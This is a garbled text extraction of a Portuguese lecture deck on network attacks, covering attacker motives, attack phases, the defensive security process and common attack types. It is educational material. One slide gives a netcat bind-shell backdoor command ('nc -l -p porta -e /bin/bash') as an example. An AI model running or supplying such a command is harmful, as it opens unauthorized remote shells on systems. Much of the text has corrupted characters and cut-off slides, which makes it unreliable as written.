Download - Ataque a Rede
-
7/24/2019 Ataque a Rede
1/43
omputadores
-
7/24/2019 Ataque a Rede
2/43
!
nicialmente! se conscienti"ando###
$ importante ter em mente os passos quecorrespondem a um ataque#
%or&m! & importante sempre lem'rar que alguns invasores so mais inteligentes que a
pessoa que implementou a segurana(
que vrios invasores so imprevisveis( que a preveno eventualmente )al*a#
-
7/24/2019 Ataque a Rede
3/43
"
+uem pode invadir,
%essoas com con*ecimento t&cnico# Atualmente! qualquer pessoa com acesso -
nternet e interesse em aprender! pois possuem.
acesso - sites de a/uda( acesso - scripts prontos(
acesso - tutoriais de ataque#
A nternet )ornece conte0do )acilitado e atuali"ado. ensinando a 'urlar os sistemas de segurana(
permitindo que pessoas com pouco con*ecimentoataquem computadores com ou sem proteo#
-
7/24/2019 Ataque a Rede
4/43#
1 que leva - invaso,
Ato de desco'rir vulnera'ilidades no sistema! para simplesmente para divulgar a )al*a!
ou para utili"ar o sistema!
para gan*ar status! etc#
Ato de dani)icar um sistema! por diverso!
por concorrncia! etc#
Ato de o'ter os dados importantes do sistema para utili"ao pr2pria!
para terceiros! etc#
1u simplesmente por pra"er###
-
7/24/2019 Ataque a Rede
5/43$
1utros )atores que levam - invaso
Espionagem industrial( %roveito pr2prio( ne3perincia(
4ingana( Status ou 5ecessidade de Aceitao( Curiosidade e Aprendi"ado( 6usca de aventuras( 7aldade( Aca'ar com a corrupo( Diversos outros motivos###
-
7/24/2019 Ataque a Rede
6/43%
Uma curiosidade###
5a Filosofia Hacker! um atacante. deve estudar e o'ter o maior con*ecimento
possvel!
no pode )icar se e3i'indo! se ac*ando o tal! no deve cometer atitudes Lammer!
deve dei3ar um sistema com sua )al*a para umapossvel utili"ao )utura#
-
7/24/2019 Ataque a Rede
7/43
&
8ipos de atacantes
Curiosos. 9eralmente estudantes procurando diverso#
n:*ouse. Funcionrios ou e3:)uncionrios de empresas#
8&cnicos. 9ostam de criar programas e compartil*ar com os
outros! possuem muito con*ecimento# %ro)issionais.
Aqueles que rece'em pelo que )a"em#
-
7/24/2019 Ataque a Rede
8/43
'
1 atacante###
1s passos de um atacante envolvem. ;econ*ecimento da rede(
E3plorao da rede(
1 re)oro( A consolidao dos planos(
E o saque#
Com esses passos o invasor pode tirarvantagem de uma vtima#
-
7/24/2019 Ataque a Rede
9/43
(
;econ*ecimento
%rocesso de. validar a conectividade!
enumerar os servios e
veri)icar por vulnera'ilidade de aplica
-
7/24/2019 Ataque a Rede
10/43
)*
E3plorao
%rocesso de violao! que corrompe ou penetraos servios de um alvo#
Alguns e3emplos de violao so.
acessar o servidor por algum servio utili"ando umacesso legtimo ou no(
criar uma e3ecuo de um servio no prevista porseus programadores(
acessar um sistema! gan*ando privil&gios seminterromper o servio )ornecido#
-
7/24/2019 Ataque a Rede
11/43
))
;e)oro
%rocesso onde o intruso aproveita o acessosem autori"ao! 4eri)ica )al*as e gan*a mais capacidades no alvo#
9eralmente! instalam meios de comunicar como mundo e3terno# E3. backdoors: t0neis de acesso mais complicados de
serem encontrados. servidor.py e cliente.py Servidor: nc -l -p porta -e /bin/bash
Cliente: nc IP porta
-
7/24/2019 Ataque a Rede
12/43
)!
Consolidao
%rocesso de comunicao do intruso ao alvocom um backdoor#
= trs casos de sua consolidao.
A'rir uma porta por onde um invasor pode seconectar ao programa do backdoor(
Fa"er o programa do backdoorse conectar ao % doinvasor(
Fa"er o programa do backdoorse conectar a umnternet ;ela> C*at ?;C@ para rece'er asinstru
-
7/24/2019 Ataque a Rede
13/43
)"
Saque
Envolve. rou'ar in)orma
-
7/24/2019 Ataque a Rede
14/43
)#
A deteco do invasor
5o recon*ecimento. a probabilidade de detec!o " de m"dia para alta.
os atacantes devem e3ecutar servios de
desco'erta durante um longo tempo! utili"andopadr
-
7/24/2019 Ataque a Rede
15/43
)$
A Deteco do nvasor
5a e3plorao. a probabilidade de detec!o " alta.
para e)etuar tentativas de acesso! os atacantes
utili"am e#ploitsnos servios o)erecidos# Essas )erramentas no apresentam um tr)ego
legtimo#
%ode ser detectado por Sistemas de Deteco de
ntrusos#
-
7/24/2019 Ataque a Rede
16/43
)%
A Deteco do nvasor
5o re)oro. a probabilidade de detec!o " alta.
as )erramentas utili"adas pelos atacantes para
o'ter mais privil&gios ou para dis)arar a invasocausam uma atividade suspeita nos servidores#
essa atividade pode ser )acilmente acompan*ada eidenti)icada#
-
7/24/2019 Ataque a Rede
17/43
A Deteco do nvasor
5a consolidao a probabilidade de detec!o " de bai#a para m"dia
o atacante tem o controle total atrav&s da
comunicao de sua mquina com a mquina alvo seus limites so impostos somente pelo controle de
acesso e de tr)ego dos dispositivos da rede
1 per)il do tr)ego & o 0nico que pode identi)icar
padr
-
7/24/2019 Ataque a Rede
18/43
A Deteco do nvasor
5o saque a probabilidade de detec!o " de bai#a para m"dia
o tr)ego do atacante vem de uma mquina de
con)ianaB Uma )orma possvel para deteco
con*ecer o tra'al*o dos sistemas internos detectar divergncias
-
7/24/2019 Ataque a Rede
19/43
1 %rocesso de Segurana
-
7/24/2019 Ataque a Rede
20/43
%rocesso de Segurana
Segurana & um processo e no um estado# Envolve quatro passos
de avaliao!
de proteo! de deteco e
de resposta ao ocorrido#
-
7/24/2019 Ataque a Rede
21/43
Avaliao
Envolve determinar medidas que possam garantir a pro'a'ilidadede sucesso ao de)ender uma empresa ou instituio#
Deve:se de)inir Uma poltica de segurana
1s servios que estaro disponveis em uma empresa
Este passo de)ine como ser o tr)ego da instituio Se a poltica de)inida )or realmente rigorosa! qualquer outro tr)ego
no con*ecido & um incidente na rede! sendo ou no um ataque 1s incidentes originam tam'&m de tentativas de usurios internos
de escaparem das regras A equipe de gerncia de)ine como invaso ou somente violao da
poltica %or&m! sempre se 'aseiam na poltica de segurana adotada
-
7/24/2019 Ataque a Rede
22/43
%roteo
$ a aplicao das medidas de)ensivas 4isa redu"ir a pro'a'ilidade de incidentes %ro'lema crtico na auditoria de tr)ego
+uantidade de tr)ego que deve ser monitorada Deve:se redu"ir a quantidade de tr)ego ou as )ormas de
acesso Assim! tem:se um tr)ego menor para monitorar e
analisar
-
7/24/2019 Ataque a Rede
23/43
Deteco
$ o processo de identi)icar os intrusos coletando!
identi)icando!
validando e escalonando eventos suspeitos
As invas
-
7/24/2019 Ataque a Rede
24/43
Deteco
;equer quatro passos. Coletar. inspecionar e arma"enar in)orma
-
7/24/2019 Ataque a Rede
25/43
Deteco : 4alidao
1s eventos podem ser assimilados em uma dascategorias. acesso sem autori"ao como administrador
acesso de usurio sem autori"ao tentativas de acesso sem autori"ao
ataque de negao de servio com sucesso
prtica de segurana ruim ou violao da poltica
recon*ecimentoprovase3plora
-
7/24/2019 Ataque a Rede
26/43
;esposta
$ o processo de validar os )rutos da deteco e
tomar medidas para remediar as invas
-
7/24/2019 Ataque a Rede
27/43
8ipos de Ataques
-
7/24/2019 Ataque a Rede
28/43
Furto e que'ra de sen*as
1 arquivo de sen*a rou'ado de um servidor &su'metido a que'ra por uma )erramenta decrac de sen*a#
Assim & o'tido as sen*as dos usurios quetiveram seu servidor invadido# o*n 8*e ;ipper
-
7/24/2019 Ataque a Rede
29/43
=omem do 7eio
-
7/24/2019 Ataque a Rede
30/43
5egao de Servio ?DoS@
So'recarga de um servidor com umaquantidade e3cessiva de solicita
-
7/24/2019 Ataque a Rede
31/43
Engen*aria Social
...Se#ta feira as %&:'' da tarde o operador doCP( de )ma *rande empresa recebe )mtelefonema do +diretor financeiro+ solicitandos)a senha para trabalhar remotamente, o
operador *entilmente fornece a informa!o e noo)tro dia vai descobrir )e foi en*anado.
Este & um e3emplo do e3pediente usado para
este tipo de ataque#
-
7/24/2019 Ataque a Rede
32/43
Fal*as de Autenticao
Um programa pede para e)etuar o loginUsername. marcia
%assord. GGGGGGGG E3plorando )al*as!
o programa de login pode ser atacado
e pode )ornecer acesso sem nome eou sen*a
#emplo com shell...
-
7/24/2019 Ataque a Rede
33/43
Fal*as de %rotocolos
Ataques DoS ?negao de servio@ ;einicia ou para o servio
1u causa lentido
Ataque HA5D Um invasor emite pacotes de requisio de cone3o
com endereos %s de origem e destino
S f
-
7/24/2019 Ataque a Rede
34/43
Spoofin*
Usar uma mquina para )a"er de conta que &outra
%ode:se
)or/ar o endereo de origem de um ou mais hosts atacar o D5S
atacar como mquina do meio
%ara reali"ar uma sesso 'em sucedida despoofin*! costuma:se matarB temporariamente amquina que est personi)icando
#emplos....
4 t d i )
-
7/24/2019 Ataque a Rede
35/43
4a"amento de in)ormao
1'tido atrav&s da resposta a consulta de %ing!
8raceroute!
8elnet! 5map!
etc#
n)orma
-
7/24/2019 Ataque a Rede
36/43
ail 0omb
7il*ares de mensagens enviadas a uma cai3apostal
1 o'/etivo do atacante &
apenas enviar li3o para a cai3a postal de algu&m e congestionar a via de acesso corporativo -
nternet
E3istem diversos programas que automati"amo mail bombin*
C l d 8 i
-
7/24/2019 Ataque a Rede
37/43
Cavalos de 8roia
1 termo vem de uma passagem da lada de=omero! na qual os gregos deram de presenteum imenso cavalo de madeira a seus inimigos!os troianos! aparentemente como o)erta de uma
proposta de pa"# %or analogia! *o/e na in)ormtica! o termo tro1an
ou cavalo de troia& usado para designar uma
categoria de programas destrutivosmascarados em programas e aplicativos
S d ?P bi @
-
7/24/2019 Ataque a Rede
38/43
Sondagem ?Probin*@
Escanear a rede com scanners programas que 'uscam portas 8C% a'ertas por
onde pode ser )eita uma invaso
%ara evitar a deteco! alguns scannerstestam portas de um computador
durante muitos dias em *orrios aleat2rios
S )
-
7/24/2019 Ataque a Rede
39/43
Smur)
Um tipo de ataque de negao de servio Como )unciona
1 agressor envia solicita
-
7/24/2019 Ataque a Rede
40/43
Sniffin*
%rograma ou dispositivo que captura o tr)egode rede So 0teis para gerenciamento de redes
7as nas mos cracers permitem rou'arsen*as e outras in)orma
-
7/24/2019 Ataque a Rede
41/43
%ing da 7orte
$ o envio de um pacote % com taman*o maiorque o m3imo permitido ?JKKLK '>tes@ para amquina que se dese/a atacar
1 pacote & enviado na )orma de )ragmentos equando a mquina destino tenta montar estes)ragmentos! in0meras situa
-
7/24/2019 Ataque a Rede
42/43
Ataque de replay
Forma particular de ataque em que parte de umatransmisso de rede & gravada e reprodu"idaposteriormente#
5ormalmente! esse tipo de ataque est associado a
uma criptogra)ia mal estruturada 1nde est o pro'lema
credencial )or codi)icada sempre da mesma maneira(
o atacante pode gravar a sequncia criptogra)ada
e incorpor:la em uma transmisso reali"ada por ele mesmo Assim! sem sa'er a sen*a! seria possvel conseguir acesso
ao sistema#
-
7/24/2019 Ataque a Rede
43/43